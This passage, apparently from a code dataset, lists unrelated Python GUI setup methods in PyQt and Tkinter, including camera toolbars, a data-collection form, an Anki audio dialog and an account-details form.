QAction(QIcon.fromTheme('exit'), 'Exit', self)\n exit_act.setShortcut('Ctrl+Q')\n exit_act.setStatusTip(\"Exit application\")\n exit_act.triggered.connect(self.app.quit)\n self.toolbar.addAction(exit_act)\n\n preferences_action = QAction(QIcon.fromTheme(\"preferences-desktop\"),\n \"Preferences\", self)\n preferences_action.setStatusTip(\"Open preferences dialog\")\n preferences_action.triggered.connect(self.open_preferences)\n self.toolbar.addAction(preferences_action)\n\n self.device_label = QLabel(\"Device:\")\n self.device_combo = QComboBox(self)\n self.device_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n # self.device_combo.setMinimumWidth(300)\n self.device_combo.activated[str].connect(self.on_device_selected)\n self.toolbar.addWidget(self.device_label)\n self.toolbar.addWidget(self.device_combo)\n\n self.format_label = QLabel(\"Format:\")\n self.format_combo = QComboBox(self)\n self.format_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n self.format_combo.setMinimumWidth(150)\n self.format_combo.activated[str].connect(self.on_format_selected)\n self.toolbar.addWidget(self.format_label)\n self.toolbar.addWidget(self.format_combo)\n\n self.resolution_label = QLabel(\"Resolution:\")\n self.resolution_combo = TcamComboBox(self, \"Select Resolution\")\n self.resolution_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n self.resolution_combo.activated[str].connect(self.on_resolution_selected)\n self.toolbar.addWidget(self.resolution_label)\n self.toolbar.addWidget(self.resolution_combo)\n\n self.fps_label = QLabel(\"FPS:\")\n self.fps_combo = TcamComboBox(self, \"Select FPS:\")\n self.fps_combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)\n self.fps_combo.activated[str].connect(self.on_fps_selected)\n self.toolbar.addWidget(self.fps_label)\n self.toolbar.addWidget(self.fps_combo)\n\n self.save_image = QAction(\"Save Image\", self)\n self.save_image.setIcon(QIcon.fromTheme(\"insert-image\"))\n\n self.save_image.triggered.connect(self.save_image_action)\n self.toolbar.addAction(self.save_image)\n\n self.fit_to_win = QAction(\"Fit To Window\", self)\n self.fit_to_win.setIcon(QIcon.fromTheme(\"zoom-fit-best\"))\n\n self.fit_to_win.triggered.connect(self.fit_to_window)\n self.toolbar.addAction(self.fit_to_win)\n\n self.props_action = QAction(\"\", self)\n self.props_action.setText(\"Properties\")\n self.props_action.setVisible(False)\n self.props_action.triggered.connect(self.toggle_properties_dialog)\n self.toolbar.addAction(self.props_action)\n\n self.recording_action = QAction(\"\", self)\n self.recording_action.setIcon(QIcon.fromTheme(\"media-record\"))\n self.recording_action.setIconText(\"Start recording\")\n self.recording_action.setText(\"Start recording\")\n self.recording_action.triggered.connect(self.start_recording_video)\n self.toolbar.addAction(self.recording_action)\n\n self.set_device_menus_enabled(False)\n\n self.view = None", "def fromControls(self,widget):", "def initializeUI(self):\n self.setStyleSheet(abstyle)\n self.setGeometry(140, 100, 860, 484)\n self.setWindowTitle('Emotions Data View')\n self.setupModelView()", "def create_view(self):\n title_label = Label(self, text='Upload, Preview, Describe and Visualize',\n fg='blue', font=('Arial', 16))\n title_label.pack(fill=BOTH, expand=True)\n select_file_button = Button(self, background='White', text='Select Data File [.csv, .xlsx, .xls, .json, .txt]',\n command=self.start_upload)\n select_file_button.pack(padx=5, pady=10)", "def set_GUI(\r\n self\r\n ):\r\n self.top = tk.Tk()\r\n 
self.top.title(\"Data Collection Interface\")\r\n \r\n self.get_label(\r\n self.top,\r\n text = \"Folder name\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 0,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_path = self.get_entry(\r\n self.top,\r\n default_txt = \"Collected_data\",\r\n enable = True,\r\n width = 30,\r\n row = 0,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Number of Images\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 1,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_num_images = self.get_entry(\r\n self.top,\r\n default_txt = \"1800\",\r\n enable = True,\r\n width = 30,\r\n row = 1,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Total Time\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 2,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_tot_time = self.get_entry(\r\n self.top,\r\n default_txt = \"15\",\r\n enable = True,\r\n width = 30,\r\n row = 2,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Minutes\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 2,\r\n column = 2,\r\n return_lbl = False\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Time between photos\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 3,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_interval = self.get_entry(\r\n self.top,\r\n default_txt = \"0.001\",\r\n enable = False,\r\n width = 30,\r\n row = 3,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Seconds\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 3,\r\n column = 2,\r\n return_lbl = False\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Images Per Folder\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 4,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_images_per_folder = self.get_entry(\r\n self.top,\r\n default_txt = \"500\",\r\n enable = True,\r\n width = 30,\r\n row = 4,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Progress Display Frequency\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 5,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_prog_display_freq = self.get_entry(\r\n self.top,\r\n default_txt = \"5\",\r\n enable = True,\r\n width = 30,\r\n row = 5,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Preview Display Frequency\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 6,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.e_prew_display_freq = self.get_entry(\r\n self.top,\r\n default_txt = \"10\",\r\n enable = True,\r\n width = 30,\r\n row = 6,\r\n column = 1)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 7,\r\n column = 2,\r\n return_lbl = False\r\n )\r\n \"\"\"\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 8,\r\n column = 2,\r\n return_lbl = False\r\n 
)\"\"\"\r\n\r\n self.r_radio_button_variable = tk.IntVar(self.top,1)\r\n\r\n self.r_images_time = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_radio_button_variable ,\r\n returned_value = 1,\r\n text = \"Images + Total time\",\r\n enable = True,\r\n default_state = True,\r\n #width = 30,\r\n row = 9,\r\n column = 0,\r\n align = tk.W,\r\n command = self.block_entry)\r\n\r\n self.r_images_interval = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_radio_button_variable ,\r\n returned_value = 2,\r\n text = \"Images + Time interval\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 10,\r\n column = 0,\r\n align = tk.W,\r\n command = self.block_entry)\r\n\r\n self.r_time_interval = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_radio_button_variable ,\r\n returned_value = 3,\r\n text = \"Total time + Time interval\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 11,\r\n column = 0,\r\n align = tk.W,\r\n command = self.block_entry)\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 12,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 14,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.r_quality_variable = tk.StringVar(self.top,\"Low\")\r\n\r\n self.r_HQuality = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_quality_variable ,\r\n returned_value = \"High\",\r\n text = \"High Quality\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 16,\r\n column = 0,\r\n align = tk.W,\r\n command = self.quality_change)\r\n\r\n self.r_LQuality = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_quality_variable ,\r\n returned_value = \"Low\",\r\n text = \"Low Quality\",\r\n enable = True,\r\n default_state = True,\r\n #width = 30,\r\n row = 15,\r\n column = 0,\r\n align = tk.W,\r\n command = self.quality_change)\r\n\r\n self.r_Day_Night_variable = tk.StringVar(self.top,\"Day\")\r\n\r\n self.r_Day = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_Day_Night_variable ,\r\n returned_value = \"Day\",\r\n text = \"Day\",\r\n enable = True,\r\n default_state = True,\r\n #width = 30,\r\n row = 15,\r\n column = 1,\r\n align = tk.W,\r\n command = self.day_change)\r\n\r\n self.r_Night = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_Day_Night_variable ,\r\n returned_value = \"Night\",\r\n text = \"Night\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 16,\r\n column = 1,\r\n align = tk.W,\r\n command = self.day_change)\r\n\r\n self.c_auto_zip_variable = tk.IntVar(self.top,0)\r\n\r\n self.c_auto_zip = tk.Checkbutton(\r\n self.top,\r\n text = \"Auto Zip\",\r\n variable = self.c_auto_zip_variable)\r\n self.c_auto_zip.grid(row = 17,column = 0, sticky = tk.W)\r\n self.c_auto_zip.deselect()\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 18,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n\r\n self.l_image = self.get_label(\r\n self.top,\r\n text = None,\r\n width = None, # in characters\r\n height = None, # in lines\r\n font = None,\r\n stick = None,\r\n row = 114,\r\n column = 3,#0,\r\n return_lbl = True,\r\n 
ctr_var = None\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Progress :\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 113,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.progress_var = tk.StringVar(self.top)\r\n \r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = 40, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 113,\r\n column = 1,\r\n return_lbl = False,\r\n ctr_var = self.progress_var\r\n )\r\n \"\"\"\r\n self.lab = self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = 40, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 10,\r\n column = 1,\r\n return_lbl = True,\r\n #ctr_var = self.progress_var\r\n )\"\"\"\r\n\r\n self.b_start = self.get_button(\r\n root = self.top,\r\n button_text = \"Start\",\r\n row = 5,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.start_collecting\r\n )\r\n\r\n self.b_pause = self.get_button(\r\n root = self.top,\r\n button_text = \"Zip Folder\",\r\n row = 6,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.zip_folder\r\n )\r\n\r\n self.b_stop = self.get_button(\r\n root = self.top,\r\n button_text = \"Stop\",\r\n row = 7,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.stop_collecting\r\n )\r\n\r\n self.b_red = self.get_button(\r\n root = self.top,\r\n button_text = \"Red\",\r\n row = 10,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.red\r\n )\r\n self.b_red.config(bg='red',activebackground = 'red')\r\n\r\n self.b_yellow = self.get_button(\r\n root = self.top,\r\n button_text = \"Yellow\",\r\n row = 11,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.yellow\r\n )\r\n self.b_yellow.config(bg='yellow', activebackground = 'yellow')\r\n\r\n self.b_green = self.get_button(\r\n root = self.top,\r\n button_text = \"Green\",\r\n row = 12,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.green\r\n )\r\n self.b_green.config(bg='green', activebackground = 'green')\r\n\r\n self.b_normal = self.get_button(\r\n root = self.top,\r\n button_text = \"No light\",\r\n row = 13,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.normal\r\n )\r\n\r\n self.b_load_orientation = self.get_button(\r\n root = self.top,\r\n button_text = \"Load Orientation\",\r\n row = 15,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.load_orientation\r\n )\r\n\r\n \r\n\r\n \"\"\"\r\n self.get_label(\r\n self.top,\r\n text = \"tesing\",\r\n width = 10, # in characters\r\n height = 2, # in lines\r\n font = ('Times', '12', 'normal'),\r\n row = 0,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n \r\n self.button1 = self.get_button(\r\n root = self.top,\r\n button_text = \"test\",\r\n row = 1,\r\n column = 3,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.pt\r\n )\r\n\r\n self.entry = self.get_entry(\r\n self.top,\r\n default_txt = \"Test\",\r\n enable = True,\r\n width = 30,\r\n row = 3,\r\n column = 0)\r\n\r\n self.contrl = tk.IntVar(self.top)\r\n self.radio = self.get_radio_button(\r\n self.top,\r\n control_variable =self.contrl ,\r\n returned_value = 5,\r\n text = \"radio\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 0,\r\n column = 0,\r\n align = tk.W,\r\n command = self.pt)\r\n\r\n 
self.radio2 = self.get_radio_button(\r\n self.top,\r\n control_variable =self.contrl ,\r\n returned_value = 6,\r\n text = \"radio2\",\r\n enable = True,\r\n default_state = False,\r\n width = None,\r\n row = 1,\r\n column = 0,\r\n align = tk.W,\r\n command = self.pt)\"\"\"", "def _do_layout(self):\n return", "def _setup_ui(self):\n from functools import partial\n\n self.setStyleSheet(\n \"\"\"\n QLabel[labelField=\"true\"] {\n font-weight: bold;\n }\n \"\"\"\n )\n\n # The main layout\n self.main_layout = QtWidgets.QVBoxLayout(self)\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n\n # the form layout\n self.form_layout = QtWidgets.QFormLayout()\n self.form_layout.setLabelAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter\n )\n\n # store roles\n label_role = QtWidgets.QFormLayout.LabelRole\n field_role = QtWidgets.QFormLayout.FieldRole\n\n self.main_layout.addLayout(self.form_layout)\n\n i = -1\n\n # Reviewer\n i += 1\n reviewer_name_label = QtWidgets.QLabel(self)\n reviewer_name_label.setText(\"Reviewer\")\n self.form_layout.setWidget(i, label_role, reviewer_name_label)\n\n self.reviewer_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.reviewer_name_widget)\n\n # Task Name field\n i += 1\n task_name_label = QtWidgets.QLabel(self)\n task_name_label.setText(\"Task\")\n self.form_layout.setWidget(i, label_role, task_name_label)\n\n self.task_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.task_name_widget)\n\n # # Version Info field\n # from anima.ui.widgets.version import VersionDetailsWidget\n # self.latest_version_widget = VersionDetailsWidget(parent=self)\n # self.main_layout.insertWidget(0, self.latest_version_widget)\n\n # Review Type Field\n i += 1\n review_type_label = QtWidgets.QLabel(self)\n review_type_label.setText(\"Review Type\")\n self.form_layout.setWidget(i, label_role, review_type_label)\n\n self.review_type_widget = ReviewTypeWidget(self)\n self.review_type_widget.currentIndexChanged.connect(\n partial(self.review_type_changed_callback)\n )\n\n self.form_layout.setWidget(i, field_role, self.review_type_widget)\n\n # Timing Field\n i += 1\n effort_label = QtWidgets.QLabel(self)\n effort_label.setText(\"Timing\")\n self.form_layout.setWidget(i, label_role, effort_label)\n\n effort_layout = QtWidgets.QHBoxLayout()\n self.form_layout.setLayout(i, field_role, effort_layout)\n\n from anima.ui.widgets.timing import ScheduleTimingWidget\n from anima import defaults\n\n self.timing_widget = ScheduleTimingWidget(\n self, timing_resolution=defaults.timing_resolution\n )\n self.timing_widget.setEnabled(False)\n # set the default to 1 hour\n self.timing_widget.set_schedule_info(timing=1, unit=\"h\")\n effort_layout.addWidget(self.timing_widget)\n\n # Description Field\n i += 1\n description_label = QtWidgets.QLabel(self)\n description_label.setText(\"Description\")\n self.form_layout.setWidget(i, label_role, description_label)\n\n self.description_widget = QtWidgets.QTextEdit(self)\n self.form_layout.setWidget(i, field_role, self.description_widget)", "def initUI(self):\n language_help = _('''<h4>Language code.</h4>\n<p>This will be transmitted as part of the requst sent to the\nsites. As some sites only support one language, this is also used to\ndecide where to send the requests. Use a standard language code\nhere. Using invalid values or codes of unsupported languages will\nresult in no downloads. Do <em>not</em> use domain codes (E.g. 
use\n<code>zh</code> rather than <code>cn</code> for Chinese.)</p>''')\n self.setWindowTitle(_('Anki – Download audio'))\n self.setWindowIcon(QIcon(\":/icons/anki.png\"))\n layout = QVBoxLayout()\n self.setLayout(layout)\n edit_word_head = QLabel()\n kanji_et = _('''\\\n<h4>Requests to send to the download sites</h4>\n<p>In the split edit fields, set the kanji on the left, the\nkana on the right.</p>\n''')\n base_et = _('''\\\n<h4>Requests to send to the download sites</h4>\n<p>In split edit fields, set the expression (base) on the left, the\nreading (ruby) on the right.</p>\n''')\n single_et = _('''\\\n<h4>Requests to send to the download sites</h4>\n''')\n # Now decide which help text to show.\n # First, decide if we have any split fields.\n if any(f_data.split for f_data in self.field_data_list):\n if self.language_code and self.language_code.startswith('ja'):\n # Japanese\n edit_word_head.setText(kanji_et)\n else:\n # Chinese should not happen at the moment\n edit_word_head.setText(base_et)\n else:\n edit_word_head.setText(single_et)\n layout.addWidget(edit_word_head)\n self.create_data_rows(layout)\n line = QFrame(self)\n line.setFrameShape(QFrame.HLine)\n line.setFrameShadow(QFrame.Sunken)\n layout.addWidget(line)\n lcode_head = QLabel(_('''<h4>Language code</h4>'''))\n layout.addWidget(lcode_head)\n lang_hlayout = QHBoxLayout()\n lc_label = QLabel(_('Language code:'), self)\n lang_hlayout.addWidget(lc_label)\n lc_label.setToolTip(language_help)\n self.language_code_lineedit = QLineEdit(self)\n try:\n self.language_code_lineedit.setText(self.language_code)\n except:\n self.language_code_lineedit.setText(default_audio_language_code)\n lang_hlayout.addWidget(self.language_code_lineedit)\n self.language_code_lineedit.setToolTip(language_help)\n layout.addLayout(lang_hlayout)\n dialog_buttons = QDialogButtonBox(self)\n dialog_buttons.addButton(QDialogButtonBox.Cancel)\n dialog_buttons.addButton(QDialogButtonBox.Ok)\n dialog_buttons.accepted.connect(self.accept)\n dialog_buttons.rejected.connect(self.reject)\n layout.addWidget(dialog_buttons)", "def initUI(self):\n self.logger.debug('Setting up the Measurement GUI')\n self.setWindowTitle(self.title)\n\n self.show()\n\n self.make_combobox_scanner()\n self.make_combobox_movements()\n self.make_combobox_configurate()\n self.make_combobox_basic()", "def show(self):\n pass", "def __init__(self: object) -> None:\n super().__init__()\n self.title(\"dnazip\")\n self.configure(bg='#ebebeb')\n self.create_main()\n self.create_menu()\n self.create_buttons()\n self.file = None", "def _build(self):", "def _build(self):", "def _setup_ui(self):\n self.resize(750, 180)\n self.vertical_layout = QtWidgets.QVBoxLayout(self)\n\n # Dialog Label\n self.dialog_label = QtWidgets.QLabel(self)\n self.dialog_label.setText(\"%s Filename Template\" % self.mode)\n self.dialog_label.setStyleSheet(\"color: rgb(71, 143, 202);font: 18pt;\")\n self.vertical_layout.addWidget(self.dialog_label)\n\n # Title Line\n line = QtWidgets.QFrame(self)\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.vertical_layout.addWidget(line)\n\n # Form Layout\n self.form_layout = QtWidgets.QFormLayout()\n self.form_layout.setLabelAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter\n )\n self.vertical_layout.addLayout(self.form_layout)\n\n # ------------------------------------------------\n # Target Entity Type Field\n\n # label\n self.target_entity_type_label = QtWidgets.QLabel(\"Target Entity Type\", self)\n 
self.form_layout.setWidget(\n 0, QtWidgets.QFormLayout.LabelRole, self.target_entity_type_label\n )\n\n # field\n self.target_entity_type_combo_box = QtWidgets.QComboBox(self)\n self.form_layout.setWidget(\n 0, QtWidgets.QFormLayout.FieldRole, self.target_entity_type_combo_box\n )\n\n # ------------------------------------------------\n # Name Field\n self.name_label = QtWidgets.QLabel(\"Name\", self)\n self.form_layout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.name_label)\n self.name_fields_vertical_layout = QtWidgets.QVBoxLayout()\n self.name_validator_label = QtWidgets.QLabel(self)\n self.name_validator_label.setStyleSheet(\"color: rgb(255, 0, 0);\")\n\n from anima.ui.widgets import ValidatedLineEdit\n\n self.name_line_edit = ValidatedLineEdit(\n self, message_field=self.name_validator_label\n )\n\n self.name_fields_vertical_layout.addWidget(self.name_line_edit)\n self.name_fields_vertical_layout.addWidget(self.name_validator_label)\n self.form_layout.setLayout(\n 1, QtWidgets.QFormLayout.FieldRole, self.name_fields_vertical_layout\n )\n\n # ------------------------------------------------\n # Path Code Field\n self.path_label = QtWidgets.QLabel(\"Path\", self)\n self.form_layout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.path_label)\n\n self.path_line_edit = QtWidgets.QLineEdit(self)\n # set the default value to something useful\n self.form_layout.setWidget(\n 2, QtWidgets.QFormLayout.FieldRole, self.path_line_edit\n )\n\n # ------------------------------------------------\n # Filename Code Field\n self.filename_label = QtWidgets.QLabel(\"Filename\", self)\n self.form_layout.setWidget(\n 3, QtWidgets.QFormLayout.LabelRole, self.filename_label\n )\n\n self.filename_line_edit = QtWidgets.QLineEdit(self)\n self.form_layout.setWidget(\n 3, QtWidgets.QFormLayout.FieldRole, self.filename_line_edit\n )\n\n # ------------------------------------------------\n # Button Box\n self.button_box = QtWidgets.QDialogButtonBox(self)\n self.button_box.setOrientation(QtCore.Qt.Horizontal)\n self.button_box.setStandardButtons(\n QtWidgets.QDialogButtonBox.Cancel | QtWidgets.QDialogButtonBox.Ok\n )\n self.vertical_layout.addWidget(self.button_box)\n self.vertical_layout.setStretch(2, 1)\n\n # ------------------------------------------------\n # Default values\n self.target_entity_type_combo_box.addItems(\n [\"Task\", \"Asset\", \"Shot\", \"Sequence\"]\n )\n self.name_line_edit.set_invalid() # Empty field is not valid\n self.path_line_edit.setText(\n \"$REPO{{project.repository.code}}/{{project.code}}/\"\n \"{%- for parent_task in parent_tasks -%}{{parent_task.nice_name}}\"\n \"/{%- endfor -%}\"\n )\n self.filename_line_edit.setText(\n '{{version.nice_name}}_v{{\"%03d\"|format(version.version_number)}}'\n )\n\n # ------------------------------------------------\n # Disable Fields\n if self.mode == \"Update\":\n self.target_entity_type_combo_box.setEnabled(False)\n\n # ------------------------------------------------\n # Signals\n # Name\n QtCore.QObject.connect(\n self.name_line_edit,\n QtCore.SIGNAL(\"textChanged(QString)\"),\n self.name_line_edit_changed,\n )\n\n # Button box\n QtCore.QObject.connect(\n self.button_box, QtCore.SIGNAL(\"accepted()\"), self.accept\n )\n QtCore.QObject.connect(\n self.button_box, QtCore.SIGNAL(\"rejected()\"), self.reject\n )", "def main(self):\r\n pass", "def widget(self, request, group):", "def _init_ui(self):\n self.setWindowTitle(\"HB Havens: resultaten\")\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)\n\n 
self.setLayout(QtWidgets.QVBoxLayout())\n\n # Create figure\n self.figure = Figure(figsize=(4,4))\n self.ax = self.figure.add_subplot()\n\n self.ax.grid()\n self.ax.spines['right'].set_visible(False)\n self.ax.spines['top'].set_visible(False)\n self.ax.tick_params(axis='y', color='0.75')\n self.ax.tick_params(axis='x', color='0.75')\n self.ax.set_aspect(1)\n\n # Add canvas\n self.canvas = FigureCanvasQTAgg(self.figure)\n\n # this is the Navigation widget\n # it takes the Canvas widget and a parent\n self.layout().addWidget(self.canvas)\n\n # Add location selection\n hbox = QtWidgets.QHBoxLayout()\n label = QtWidgets.QLabel('Locatie:')\n label.setFixedWidth(80)\n hbox.addWidget(label)\n self.location_combobox = QtWidgets.QComboBox()\n self.location_combobox.addItems(self.result_locations)\n self.location_combobox.setCurrentIndex(self.locid)\n self.location_combobox.currentIndexChanged.connect(self._set_location)\n hbox.addWidget(self.location_combobox)\n self.layout().addLayout(hbox)\n\n # Add parameter selection\n hbox = QtWidgets.QHBoxLayout()\n label = QtWidgets.QLabel('Parameter:')\n label.setFixedWidth(80)\n hbox.addWidget(label)\n self.parameter_combobox = QtWidgets.QComboBox()\n self.input_parameters = self.modelunctab.mainmodel.hydraulic_loads.result_columns[:]\n self.parameter_combobox.addItems(self.input_parameters)\n self.parameter_combobox.currentIndexChanged.connect(self._set_parameter)\n self.parameter_combobox.setCurrentIndex(0)\n self._set_parameter()\n self.figure.tight_layout()\n hbox.addWidget(self.parameter_combobox)\n self.layout().addLayout(hbox)\n\n # Line\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n self.layout().addWidget(line)\n\n # Add ok/close\n self.closebutton = QtWidgets.QPushButton('Sluiten')\n self.closebutton.clicked.connect(self.close)\n self.layout().addWidget(self.closebutton, 0, QtCore.Qt.AlignRight)\n\n self.layout().setSizeConstraint(QtWidgets.QLayout.SetFixedSize)", "def place_main_gui(self):\n cont = self.container\n\n self.title = ttk.Label(cont, text='Detaliile contului')\n self.title.config(font=tkg.title_font())\n self.title.grid(row=0, column=0, sticky='w', pady=(30, 0))\n\n self.label1 = ttk.Label(cont, text='Nume cont')\n self.label1.config(font=tkg.regular_font())\n self.label1.grid(row=1, column=0, sticky='w', padx=5, pady=(30, 0))\n\n self.name_entry = ttk.Entry(cont)\n self.name_entry.config(font=tkg.regular_font())\n self.name_entry.grid(row=2, column=0, sticky='ew', pady=(5, 0))\n if platform.system() != 'Windows':\n self.name_entry.grid(padx=(0, 10))\n\n self.label2 = ttk.Label(cont, text='Email')\n self.label2.config(font=tkg.regular_font())\n self.label2.grid(row=3, column=0, sticky='w', padx=5, pady=(10, 0))\n\n self.email_entry = ttk.Entry(cont)\n self.email_entry.config(font=tkg.regular_font())\n self.email_entry.grid(row=4, column=0, sticky='ew', pady=(5, 0))\n if platform.system() != 'Windows':\n self.email_entry.grid(padx=(0, 10))\n\n self.label3 = ttk.Label(cont, text='Nume de utilizator')\n self.label3.config(font=tkg.regular_font())\n self.label3.grid(row=5, column=0, sticky='w', padx=5, pady=(10, 0))\n\n self.user_entry = ttk.Entry(cont)\n self.user_entry.config(font=tkg.regular_font())\n self.user_entry.grid(row=6, column=0, sticky='ew', pady=(5, 0))\n if platform.system() != 'Windows':\n self.user_entry.grid(padx=(0, 10))\n\n self.label4 = ttk.Label(cont, text='Parolă')\n self.label4.config(font=tkg.regular_font())\n self.label4.grid(row=7, 
column=0, sticky='w', padx=5, pady=(10, 0))\n\n pass_cont = ttk.Frame(cont)\n pass_cont.grid(row=8, column=0, sticky='ew')\n\n self.pass_entry = ttk.Entry(pass_cont, show='*', width=27)\n self.pass_entry.config(font=tkg.regular_font())\n self.pass_entry.grid(row=0, column=0, padx=(0, 10), pady=(5, 0))\n\n self.hide_button = hidebutton.HideButton(pass_cont, self.pass_entry)\n self.hide_button.grid(row=0, column=1, padx=(0, 10), pady=(5, 0))\n\n self.clip_button = clipbutton.ClipButton(pass_cont, self.pass_entry)\n self.clip_button.grid(row=0, column=2, pady=(5, 0))\n\n self.error_label = tk.Label(cont, text='')\n self.error_label.config(font=tkg.small_regular_font(), fg='red')\n self.error_label.grid(row=9, column=0, pady=(10, 10))", "def initUI(self):\n centralwidget = QtWidgets.QWidget()\n self.setCentralWidget(centralwidget)\n\n person_table = PersonTable(self)\n person_table.embed(self.sql)\n\n # Box Layout to organize our GUI\n lay = QtWidgets.QVBoxLayout(centralwidget)\n lay.addWidget(person_table)\n self.setGeometry(0, 0, person_table.width() + 20, person_table.height() + 20)\n self.person_table = person_table\n self.show()", "def build_ui(self):\n self.ui = UI_procstep.Ui_Form()#.Ui_USGSContactInfoWidgetMain()\n self.ui.setupUi(self)\n self.setup_dragdrop(self)\n\n self.proc_step = RepeatingElement(which='tab',\n tab_label='Step', add_text='Additional Step',\n widget=ProcessStep, remove_text='Remove Step', italic_text='Processing Steps Taken')\n\n #self.proc_step = RepeatingElement(params=params, which='tab', tab_label='Source',)\n self.proc_step.add_another()\n self.ui.widget_procstep.layout().addWidget(self.proc_step)", "def _init_display(self):\n raise NotImplementedError", "def build_UI(self):\n\n #Common local coordinates to change the UI positions\n common_x = 0\n common_y = 5\n\n #Create the Main Title\n self.titleFont = font.Font(family = FONTS[\"lucida grande\"], size = 30)\n self.title = cGUIf.get_TextLabel(self,\n \"File Converter App \",\n self.titleFont,\n 135 + common_x,\n 40 + common_y)\n\n #Add the \"Main Icon\"\n self.mainIcon = 